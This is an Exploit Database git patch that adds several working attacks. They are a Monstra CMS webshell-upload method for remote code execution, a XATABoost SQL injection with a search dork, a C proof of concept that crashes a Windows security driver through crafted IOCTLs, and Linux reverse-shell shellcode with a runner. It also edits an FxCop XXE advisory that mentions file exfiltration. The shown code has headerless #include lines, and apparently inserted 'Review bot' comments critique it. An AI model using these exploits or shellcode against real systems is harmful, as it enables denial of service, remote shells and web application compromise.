From 2d5885c58b20ac103fae1aa1b1198a12ed9341c4 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 15 May 2018 05:01:47 +0000
Subject: [PATCH] DB: 2018-05-15
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
5 changes to exploits/shellcodes
2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service
FxCop 10/12 - XML External Entity Injection
Microsoft Windows FxCop 10/12 - XML External Entity Injection
Apple Safari 3.2.x - 'XXE' Local File Theft
Apple Safari 3.2.x - XML External Entity Local File Theft
Open-AudIT Community - 2.2.0 – Cross-Site Scripting
Open-AudIT Community 2.2.0 - Cross-Site Scripting
Monstra CMS 3.0.4 - Remote Code Execution
XATABoost 1.0.0 - SQL Injection
Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell Shellcode (96 Bytes)
---
 exploits/php/webapps/44621.txt | 23 ++++
 exploits/php/webapps/44622.txt | 21 ++++
 exploits/windows/dos/44619.cpp | 176 +++++++++++++++++++++++++++++++
 exploits/windows/local/44603.txt | 58 ++--------
 files_exploits.csv | 9 +-
 files_shellcodes.csv | 1 +
 shellcodes/linux_x86/44620.c | 122 +++++++++++++++++++++
 7 files changed, 356 insertions(+), 54 deletions(-)
 create mode 100644 exploits/php/webapps/44621.txt
 create mode 100644 exploits/php/webapps/44622.txt
 create mode 100644 exploits/windows/dos/44619.cpp
 create mode 100644 shellcodes/linux_x86/44620.c
diff --git a/exploits/php/webapps/44621.txt b/exploits/php/webapps/44621.txt
new file mode 100644
index 000000000..4cc0aa20e
--- /dev/null
+++ b/exploits/php/webapps/44621.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Monstra CMS 3.0.4 Upload Plugin Remote code execution CVE-2018-9037
+# Date: 2018-05-14
+# Exploit Author: Jameel Nabbo
+# Vendor Homepage: https://github.com/monstra-cms/monstra
+# Software Link: https://github.com/monstra-cms/monstra
+# Version: 3.0.4
+# Tested on: MAC OSX
+# CVE :CVE-2018-9037
+
+
+Monstra CMS 3.0.4 allows remote code execution via an upload_file request for a .zip file,
+which is automatically extracted and may contain .php files.
+
+
+Steps to Reproduce
+1: Log in as a user with page editing permissions
+2: Upload a plugin archive containing php webshell code
+3: After successful upload we can execute the command.
+
+Then go to: http://127.0.0.1/plugins/{Name_Of_Zip_File_You_Uploaded}/{File_In_Zip}.php
+
+Solution
+Filter plugin content during plugin upload
\ No newline at end of file
diff --git a/exploits/php/webapps/44622.txt b/exploits/php/webapps/44622.txt
new file mode 100644
index 000000000..a4eb857e9
--- /dev/null
+++ b/exploits/php/webapps/44622.txt
@@ -0,0 +1,21 @@
+# Exploit Title: XATABoost CMS Sql Injection
+# Google Dork: inurl:php?id= Powered by XATABOOST
+# Date: 02.01.2018
+# Exploit Author: MgThuraMoeMyint
+# Vendor Homepage: http://www2.xataboost.com
+# Version: 1.0.0
+# Tested on: Kali Linux
+# SQL Injection Type: Union Based
+# Example URL: http://localhost/news.php?id=[Injection Point]
+
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/news.php?id=[Injection Point]
+Connection: keep-alive
+GET /xata/nonprofit/000026/css/custom.css.php?x=1c383cd30b7c298ab50293adfecb7b18
+HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/css,*/*;q=0.1
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/news.php?id=[Injection Point]
\ No newline at end of file
diff --git a/exploits/windows/dos/44619.cpp b/exploits/windows/dos/44619.cpp
new file mode 100644
index 000000000..aab606557
--- /dev/null
+++ b/exploits/windows/dos/44619.cpp
@@ -0,0 +1,176 @@ +# Exploit Title: [BSOD by IOCTL 0x8000200D in 2345NsProtect.sys of 2345 Security Guard 3.7] +# Date: [20180513] +# Exploit Author: [anhkgg] +# Vendor Homepage: [http://safe.2345.cc/] +# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe] +# Version: [v3.7] (REQUIRED) +# Tested on: [Windows X64] +# CVE : [CVE-2018- 11034] + +#include +#include + +struct NETFW_IOCTL_ADD_PID +{ + DWORD pid; + char seed[0x14];// +};//0x18 + +struct NETFW_IOCTL_SET_PID +{ + BYTE set_state;// + BYTE unk;//1 + WORD buf_len;//2 + DWORD pid;//4 + char buf[0x64];//8 +};//6c + +struct NETFW_IOCTL_222040 +{ + DWORD* ptr; + DWORD size; +};// + +int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2) +{ + int result; + + *a1 ^= *a2; + *a2 ^= *a1; + result = (unsigned __int8)*a2; + *a1 ^= result; + return result; +} + +int __stdcall sub_12A80(char *a1, int len, char *a3) +{ + int result; + unsigned __int8 v4; + __int16 i; + __int16 j; + unsigned __int8 k; + + for ( i = 0; i < 256; ++i ) + a3[i] = i; + a3[256] = 0; + a3[257] = 0; + k = 0; + v4 = 0; + result = 0; + for ( j = 0; j < 256; ++j ) + { + v4 += a3[j] + a1[k]; + f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]); + result = (k + 1) / len; + k = (k + 1) % len; + } + return result; +} + +char *__stdcall sub_12B60(char *a1, signed int len, char *a3) +{ + char *result; + __int16 i; + unsigned __int8 v5; + unsigned __int8 v6; + + v5 = a3[256]; + v6 = a3[257]; + for ( i = 0; i < len; ++i ) + { + v6 += a3[++v5]; + f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]); + a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])]; + } + a3[256] = v5; + result = a3; + a3[257] = v6; + return result; +} + +void calc_seed(char* seed, char* dst) +{ + char Source1[26] = {0}; + char a3[300] = {0}; + + Source1[0] = 8; + Source1[1] = 14; + Source1[2] = 8; + Source1[3] = 10; + Source1[4] = 2; + Source1[5] = 3; + Source1[6] = 29; + Source1[7] = 23; + Source1[8] = 13; + Source1[9] = 3; + Source1[10] = 15; + Source1[11] = 22; + Source1[12] = 15; + 
Source1[13] = 7; + Source1[14] = 91; + Source1[15] = 4; + Source1[16] = 18; + Source1[17] = 26; + Source1[18] = 26; + Source1[19] = 3; + Source1[20] = 4; + Source1[21] = 1; + Source1[22] = 15; + Source1[23] = 25; + Source1[24] = 10; + Source1[25] = 13; + + sub_12A80(seed, 0x14, a3); + sub_12B60(Source1, 0x1A, a3); + memcpy(dst, Source1, 26); +} + +int poc_2345NetFirewall() +{ + HANDLE h = CreateFileA("\\\\.\\2345NetFirewall", + GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, + NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if(h == INVALID_HANDLE_VALUE) { + printf("[-] Open device error: %d\n", GetLastError()); + return 1; + } + DWORD BytesReturned = 0; + + DWORD ctlcode = 0x222298; + NETFW_IOCTL_ADD_PID add_pid = {0}; + add_pid.pid = GetCurrentProcessId(); + + if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + ctlcode = 0x2222A4; + NETFW_IOCTL_SET_PID set_pid = {0}; + set_pid.pid = GetCurrentProcessId(); + set_pid.set_state = 1; + + calc_seed(add_pid.seed, set_pid.buf); + set_pid.buf_len = 26; + + if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + //BSOD + ctlcode = 0x222040; + NETFW_IOCTL_222040 buf_222040 = {0}; + buf_222040.size = 1; + buf_222040.ptr = (DWORD*)0x80000000; + if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + return 0; +} + +int main() +{ + poc_2345NetFirewall(); + + return 0; +} \ No newline at end of file diff --git a/exploits/windows/local/44603.txt b/exploits/windows/local/44603.txt index 8fe66f378..e9f557443 100644 
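Review bot: The printf calls in poc_2345NetFirewall pass DWORD values to `%x` and `%d`, but DWORD is `unsigned long` on Windows, so each is a format/argument mismatch that -Wformat flags; `printf("[-] DeviceIoControl %lx error: %lu\n", ctlcode, GetLastError());` (and `%lu` in the open-device message) matches the types. The handle returned by CreateFileA is never passed to CloseHandle on any return path, so the non-crashing paths leak it. The two `#include` directives in this hunk carry no header name, which looks like a capture artifact of the page rather than the committed text, but as shown the file does not compile. f_XOR__12A30 is an XOR swap and therefore zeroes the byte when both pointers alias rather than leaving it unchanged; if that mirrors the decompiled driver routine it is intentional and deserves a comment, otherwise the aliasing case in sub_12A80 and sub_12B60 is a bug.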
--- a/exploits/windows/local/44603.txt +++ b/exploits/windows/local/44603.txt @@ -1,34 +1,12 @@ -[+] Credits: hyp3rlinx -[+] Website: hyp3rlinx.altervista.org -[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-FXCOP-XML-EXTERNAL-ENTITY-INJECTION.txt -[+] ISR: Apparition Security - +# Exploit Title: Microsoft Windows FxCop 10/12 - XML External Entity Injection +# Date: 2018-03-15 +# Exploit Author: Debashis Pal +# Vendor Homepage: www.microsoft.com +# Version: Microsoft Windows "FxCop" v10-12 +# CVE : N/A ***Greetz: indoushka|Eduardo|Dirty0tis*** - -Vendor: -======== -www.microsoft.com - - -Product: -=========== -Microsoft Windows "FxCop" v10-12 - - - -Vulnerability Type: -=================== -XML External Entity - - - -CVE Reference: -============== -N/A - - Security Issue: ================ FxCop is vulnerable to XML injection attacks allowing local file exfiltration and or NTLM hash theft. Tested in Windows 7 and Windows 10 download SDK it works in both. 
@@ -72,32 +50,10 @@ Exploit/POC: Files get exfiltrated to attacker server. -Network Access: -=============== -Remote - - - -Severity: -========= -High - - - Disclosure Timeline: ============================= Vendor Notification: March 15, 2018 Vendor opens MSRC Case 44322?: March 16, 2018 Vendor reproduces issue : April 6, 2018 Vendor decides to pull all download links instead of advisory or fix : April 9, 2018 -May 9, 2018 : Public Disclosure - - - -[+] Disclaimer -The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. -Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and -that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit -is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility -for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information -or exploits by the author or elsewhere. All content (c). \ No newline at end of file +May 9, 2018 : Public Disclosure \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fba37c42f..0ffe1d90e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -5970,6 +5970,7 @@ id,file,description,date,author,type,platform,port
 44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows,
 44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows,
 44615,exploits/windows/dos/44615.cpp,"2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service",2018-05-11,anhkgg,dos,windows,
+44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9709,7 +9710,7 @@ id,file,description,date,author,type,platform,port
 44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,
 44590,exploits/windows/local/44590.txt,"DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)",2018-05-06,hyp3rlinx,local,windows,
 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,
-44603,exploits/windows/local/44603.txt,"FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
+44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
 44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
@@ -10930,7 +10931,7 @@ id,file,description,date,author,type,platform,port
 8861,exploits/osx/remote/8861.rb,"Apple iTunes 8.1.1 - 'ITMS' Multiple Protocol Handler Buffer Overflow (Metasploit)",2009-06-03,"Will Drewry",remote,osx,
 8880,exploits/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,remote,linux,
 8897,exploits/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files",2009-06-08,"Jonathan Salwan",remote,windows,
-8907,exploits/multiple/remote/8907.txt,"Apple Safari 3.2.x - 'XXE' Local File Theft",2009-06-09,"Chris Evans",remote,multiple,
+8907,exploits/multiple/remote/8907.txt,"Apple Safari 3.2.x - XML External Entity Local File Theft",2009-06-09,"Chris Evans",remote,multiple,
 8916,exploits/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - Control Server Remote Buffer Overflow",2009-06-09,His0k4,remote,windows,80
 8922,exploits/windows/remote/8922.txt,"Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",remote,windows,
 8930,exploits/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",remote,windows,
@@ -39302,6 +39303,8 @@ id,file,description,date,author,type,platform,port
 44606,exploits/hardware/webapps/44606.html,"Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery",2018-05-10,"Raffaele Sabato",webapps,hardware,
 44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
 44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,
-44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community - 2.2.0 – Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
+44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community 2.2.0 - Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
 44617,exploits/php/webapps/44617.txt,"WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
 44618,exploits/php/webapps/44618.txt,"WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
+44621,exploits/php/webapps/44621.txt,"Monstra CMS 3.0.4 - Remote Code Execution",2018-05-14,JameelNabbo,webapps,php,
+44622,exploits/php/webapps/44622.txt,"XATABoost 1.0.0 - SQL Injection",2018-05-14,MgThuraMoeMyint,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index fbd0d2cf0..d1a155cb3 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -883,3 +883,4 @@ id,file,description,date,author,type,platform
 44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
 44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
 44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86
+44620,shellcodes/linux_x86/44620.c,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell Shellcode (96 Bytes)",2018-05-14,"Paolo Perego",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44620.c b/shellcodes/linux_x86/44620.c
new file mode 100644
index 000000000..8bda0e4e9
--- /dev/null
+++ b/shellcodes/linux_x86/44620.c
@@ -0,0 +1,122 @@ +/* +; Title: Linux/x86 - TCP reverse shell +; Author: Paolo Perego +; Website: https://codiceinsicuro.it +; Blog post: +https://codiceinsicuro.it/slae/assignment-2-create-a-reverse-shellcode/ +; Twitter: @thesp0nge +; SLAE-ID: 1217 +; Purpose: connect to a given IP and PORT and spawning a reverse shell if +; connection succeded + + +global _start + +section .text + +_start: + +; Creating the socket. +; +; int socket(int domain, int type, int protocol); +; +; socket() is defined as #define __NR_socket 359 on +/usr/include/i386-linux-gnu/asm/unistd_32.h +; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h +; SOCK_STREAM is defined as 1 in +/usr/include/i386-linux-gnu/bits/socket_type.h +xor eax, eax +xor ebx, ebx +xor ecx, ecx +xor edx, edx + +mov ax, 0x167 +mov bl, 0x2 +mov cl, 0x1 +int 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0); +mov ebx, eax ; storing the socket descriptor into EBX for next syscall + +; Connect to my peer +; +; connect() is defined as #define __NR_connect 362 on +/usr/include/i386-linux-gnu/asm/unistd_32.h +; peer.sin_family = AF_INET; +; peer.sin_port = htons(DPORT); +; peer.sin_addr.s_addr = inet_addr(IP); +; ret = connect(sfd, (const struct sockaddr *)&peer, sizeof(struct +sockaddr_in)); + +; 127 = 0x7f +; 0 = 0x0 +; 0 = 0x0 +; 1 = 0x1 + +; push 0x0100007f +mov eax, 0xfeffff80 +xor eax, 0xffffffff +push eax +push word 0x5c11 ; port 4444 is 0x5c11 +push word 0x2 ; AF_INET is 2 + +mov ecx, esp +mov dl, 0x10 ; sizeof(struct sockaddr_in) +xor eax, eax +mov ax, 0x16a +int 0x80 + +test eax, eax ; check if eax is zero +jnz exit_on_error + +; Duplicating descriptor 0, 1, 2 to the socket opened by client +; +; int dup2(int oldfd, int newfd); +; +; dup2 is defined as #define __NR_dup2 63 in +/usr/include/i386-linux-gnu/asm/unistd_32.h + +xor ecx, ecx +mov cl, 2 +xor eax, eax + +dup2: +mov al, 0x3F ; 63 in decimal +int 0x80 ; duplicating file descriptors in backwards order; from 2 to 0 +dec ecx +jns dup2 + +; 
Executing shell +; +; int execve(const char *filename, char *const argv[], char *const envp[]); +; execve() is defined as #define __NR_execve 11 on +/usr/include/i386-linux-gnu/asm/unistd_32.h + +xor eax, eax +push eax ; The NULL byte +push 0x68732f2f ; "sh//". The second '\' is used to align our command into +the stack +push 0x6e69622f ; "nib/" +mov ebx, esp ; EBX now points to "/bin//sh" +xor ecx, ecx +xor edx, edx +mov al, 0xB ; 11 in decimal +int 0x80 + +exit_on_error: +mov bl, 0x1 +xor eax, eax ; zero-ing EAX +mov al, 0x1 +int 0x80 +*/ +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"; + + +int main(int argc, char **argv) +{ +printf("Shellcode Length: %d\n", strlen(code)); +int (*ret)() = (int(*)())code; +ret(); +} \ No newline at end of file
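Review bot: `printf("Shellcode Length: %d\n", strlen(code));` in main hands a size_t to `%d`, a type mismatch the standard leaves undefined and that -Wformat reports; `printf("Shellcode Length: %zu\n", strlen(code));` is the matching specifier. The two `#include` directives in this hunk have no header name, which looks like an artifact of how the page was captured rather than the committed text, but the file as shown does not compile. main declares `argc` and `argv` and reads neither, and the header comment's "connection succeded" should read "succeeded".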